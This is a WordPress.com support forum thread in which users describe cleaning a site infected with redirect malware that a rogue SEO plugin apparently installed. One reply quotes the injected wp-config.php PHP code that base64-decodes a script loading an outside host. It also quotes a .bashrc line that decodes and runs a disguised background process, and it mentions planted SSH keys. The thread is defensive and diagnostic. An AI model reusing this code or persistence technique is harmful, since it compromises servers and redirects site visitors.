Malware Causing Redirect; No Satisfactory Response From Support

sarahinns · Member · Jan 4, 2025 at 1:45 pm
Copy link

Add topic to favorites
WordPress, you need to get it together. There is a vulnerability somewhere that is causing malicious code to be injected and is causing redirect to malicious sites. Apparently no virus scanner could find it, and it must be manually removed. But since this is WordPress.com and you’re hosting things, I do not have total control over the website and could not figure out how to empty the cache because the redirects kept happening. At least, I think that’s what was happening. Because after I contacted you, the redirects stopped. So I don’t know what you did and you won’t get back to me to tell me. You just said that you did a scan (that was clean) and removed the malicious code that I commented out. So I have no idea whether I should have you restore the site to a previous point, in case there are other malicious files that I missed. And you won’t diagnose the problem. Was it a vulnerable plugin? Does your site have a vulnerability? Something else? Will this exact thing happen again?

My friend who owns the site will be moving away from WordPress hosting because of this. But we want a clean site to move. Not an infected one. So I would appreciate if you would get back to me.

I will explain what was happening, for the benefit of others who might be experiencing something similar.

I noticed that when running a curl command on the website url, it showed //sync.gsyndication.com/ just before <!DOCTYPE html> and I thought the placement very odd. I came across this post from December 11, 2024 explaining about some malicious code injected into wp-config.php. For reference, this is what the file looked like when I found it. See the bottom. So I commented it out and moved it before the closing php tags. But the redirection was still happening.

I also noticed in the head tags (Developer Console in the browser):
```
https://mc.yandex.ru/metrika/tag.js
//sync.gsyndication.com/
```
I started doing database queries in phpMyAdmin, and with (my wp_options has some numbers in the prefix):
```
SELECT * FROM wp_options WHERE option_value LIKE '%<script%';
```
And what caught my eye was in the option_name wpw_auto_poster_wordpress_mapped_posttypes:
```
a:22:{s:4:"post";a:4:{i:0;s:8:"facebook";i:1;s:7:"twitter";i:2;s:8:"linkedin";i:3;s:90:"onetwo"></option></select></div>\https://aka.cloudsyndication.dev/";}s:4:"page";s:0:"";s:10:"attachment";s:0:"";s:14:"e-landing-page";s:0:"";s:17:"elementor_library";s:0:"";s:7:"product";s:0:"";s:12:"sfwd-courses";s:0:"";s:12:"sfwd-lessons";s:0:"";s:10:"sfwd-topic";s:0:"";s:9:"sfwd-quiz";s:0:"";s:7:"ld-exam";s:0:"";s:17:"sfwd-certificates";s:0:"";s:6:"groups";s:0:"";s:17:"sfwd-transactions";s:0:"";s:12:"guest-author";s:0:"";s:15:"magee_portfolio";s:0:"";s:13:"mailpoet_page";s:0:"";s:11:"sfwd-essays";s:0:"";s:15:"sfwd-assignment";s:0:"";s:19:"woowgallery-dynamic";s:0:"";s:11:"testimonial";s:0:"";s:9:"pdfviewer";s:0:"";}
```
Notice https://aka.cloudsyndication.dev/? That looks super sketchy. So I backed up the value and removed it with:
```
UPDATE wp_options 
SET option_value = REPLACE(option_value, 'https://aka.cloudsyndication.dev/', '') 
WHERE option_name = 'wpw_auto_poster_wordpress_mapped_posttypes';
```
But the redirects were still happening. And then at some point after contacting support, they stopped and curl no longer shows the malicious code before the document declaration, nor is the Russian Yandex script in the head. But as is, I have every single plugin turned off, and my poor friend would like to move on with her site. Everything is basically down and not properly functional.

Please, WordPress. Help us to move on from this. I would like a restore to a previous point before the injection of the malicious code. And some explanation as to what in the world happened. I might never get an explanation, but I at least want a clean site to move so that I can have better control over the site since WordPress is not providing satisfactory services.

The blog I need help with is: (visible only to logged in users)
sarahinns · Member · Jan 4, 2025 at 1:55 pm
Copy link
WordPress is removing the script tags in my post, and there is no way to for me to edit either.
sarahinns · Member · Jan 4, 2025 at 8:15 pm
Copy link
I found the source of the malicious code. It was a plugin that no longer exists. I found it by downloading a previous backup after “Ultra SEO Processor” was installed by another administrator for this site. You can view the code here.

The plugin was the folder ultra-seo-processor and in that was a php file called ultra-seo-processor.php with the code I provided.

And support finally got back to me and said that Jetpack does backups and restores. So I was able to download previous backups and inspect the code. I will be able to restore the site, thankfully.

vouspouvezmejoindrela · Member · Jan 16, 2025 at 10:50 pm

About the sync.gsyndication.com maleware.
More information on what to do :

You can find the virus code added to wp-config.php file:

<?php ini_set("display_errors",0); ini_set("display_startup_errors",0); if (PHP_SAPI !== "cli" && (strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false && strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest")) { print(base64_decode("PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+")); } ?> //sync.gsyndication.com/

And you can find a /home/Your Username/.bashrc and its content is similar to this :

# .bashrc 
# DO NOT REMOVE THIS LINE. SEED PRNG. 
#defunct-kernel 
{ echo L2Jpbi9wa2lsbCAtMCAtVTEwMDcgZGVmdW5jdCAyPi9kZXYvbnVsbCB8fCAoVEVSTT14dGVybS0yNTZjb2xvciBHU19BUkdTPSItayAvaG9tZS9Zb3VyIFVzZXJuYW1lLy5jb25maWcvaHRvcC9kZWZ1bmN0LmRhdCAtbGlxRCIgZXhlYyAtYSAnW2tzd2FwZDBdJyAnL2hvbWUvWW91ciBVc2VybmFtZS8uY29uZmlnL2h0b3AvZGVmdW5jdCcgMj4vZGV2L251bGwp|base64 -d|bash;} 2>/dev/null #1b5b324a50524e47 >/dev/random # seed prng defunct-kernel 
# Source global definitions 
if [ -f /etc/bashrc ]; then 
. /etc/bashrc 
fi 
# Uncomment the following line if you don't like systemctl's auto-paging feature: 
# export SYSTEMD_PAGER= 
# User specific aliases and functions

The base64 code in the file above adds virus codes to the /home/Your Username/.config/htop/defunct.dat and /home/Your Username/.config/htop/defunct files.

If you decode it (ie with base64decode.org), you can read this :

/bin/pkill -0 -U1007 defunct 2>/dev/null || (TERM=xterm-256color GS_ARGS="-k /home/Your Username/.config/htop/defunct.dat -liqD" exec -a '[kswapd0]' '/home/Your Username/.config/htop/defunct' 2>/dev/null)

If you’re on a shared web space, you don’t need ssh access, so you don’t need bash access, so you don’t need this .bashrc file.
If you’re on a server to which you have bash access via ssh, then clean up this file…

Another point, the wp-config.php config file, edit this file and search something similar to this :

<?php ini_set("display_errors",0); ini_set("display_startup_errors",0); if (PHP_SAPI !== "cli" && (strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false && strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest")) { print(base64_decode("PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+")); } ?>

Hey yes, if you decode the base64 string PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+
You can see that you found the infamous sync.gsyndication.com !!

So if you find this piece of php, then enclose it into multilines comment brackets /* */, like below. This will deactivate de maleware and prevent a reinfection by this virus.

<?php /*ini_set("display_errors",0); ini_set("display_startup_errors",0); if (PHP_SAPI !== "cli" && (strpos(@$_SERVER["REQUEST_URI"], "/wp-admin/admin-ajax.php") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-json") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp/v2") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-admin") === false && strpos(@$_SERVER["REQUEST_URI"], "/wp-login.php") === false && strtolower(@$_SERVER["HTTP_X_REQUESTED_WITH"]) !== "xmlhttprequest")) { print(base64_decode("PHNjcmlwdCBzcmM9Ii8vc3luYy5nc3luZGljYXRpb24uY29tLyI+PC9zY3JpcHQ+")); }*/ ?>

By the way, I advise you to search all your php files in the base64 sequence, as there are bound to be other infected files that need to be treated in the same way as wp-config.

Have a nice day !

vouspouvezmejoindrela · Member · Jan 17, 2025 at 12:56 am
Copy link
More, the maleware is also located in 3 themes : twentytwentyone, twentytwentytwo and twentytwentythree.
It also create 2 .ssh folders which are hidden, one at the root of the site, the other in the parent folder. And in these folders it writes malicious ssh-rsa public keys in the authorized_keys file, in my case I found 4 keys.

For my part, I suspect the wp-fastest-cache plugin is part of the process, but I’m not entirely sure, I’ve to dig…

The topic ‘Malware Causing Redirect; No Satisfactory Response From Support’ is closed to new replies.

Malware Causing Redirect; No Satisfactory Response From Support

Couldn't find what you needed?

Contact us

Browse our guides

Mobile Apps

Social Media